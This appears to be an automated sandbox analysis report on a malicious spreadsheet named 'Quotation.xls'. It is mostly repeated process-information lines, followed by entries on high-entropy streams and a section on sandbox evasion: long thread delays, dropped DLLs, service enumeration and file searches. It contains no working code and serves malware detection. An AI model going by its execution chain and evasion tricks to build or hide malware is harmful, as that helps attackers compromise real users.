            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: Quotation.xlsStream path 'MBD00034653/Package' entropy: 7.97239388977 (max. 8.0)
            Source: Quotation.xlsStream path 'Workbook' entropy: 7.99932524718 (max. 8.0)
            Source: ~DF91B6A489623540E3.TMP.0.drStream path 'Package' entropy: 7.96792988005 (max. 8.0)
            Source: 37330000.0.drStream path 'MBD00034653/Package' entropy: 7.96792988005 (max. 8.0)
            Source: 37330000.0.drStream path 'Workbook' entropy: 7.99939991039 (max. 8.0)

            Malware Analysis System Evasion

            barindex
            Delayed program exit found
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0040F7A7 Sleep,ExitProcess,25_2_0040F7A7
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 70000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,25_2_0041A748
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3077Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6875Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 9838Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2777
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1339
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI coverage: 7.2 %
            Source: C:\Windows\System32\mshta.exe TID: 3316Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3440Thread sleep count: 3077 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3440Thread sleep count: 6875 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3488Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3496Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3720Thread sleep count: 149 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3720Thread sleep time: -447000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3768Thread sleep time: -240000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3720Thread sleep count: 9838 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3720Thread sleep time: -29514000s >= -30000sJump to behavior
            Source: C:\Windows\System32\mshta.exe TID: 3848Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3968Thread sleep count: 2777 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3972Thread sleep count: 1339 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4008Thread sleep time: -180000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4012Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,25_2_00409253
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,25_2_0041C291
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,25_2_0040C34D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,25_2_00409665
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0044E879 FindFirstFileExA,25_2_0044E879
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,25_2_0040880C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0040783C FindFirstFileW,FindNextFileW,25_2_0040783C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,25_2_00419AF5
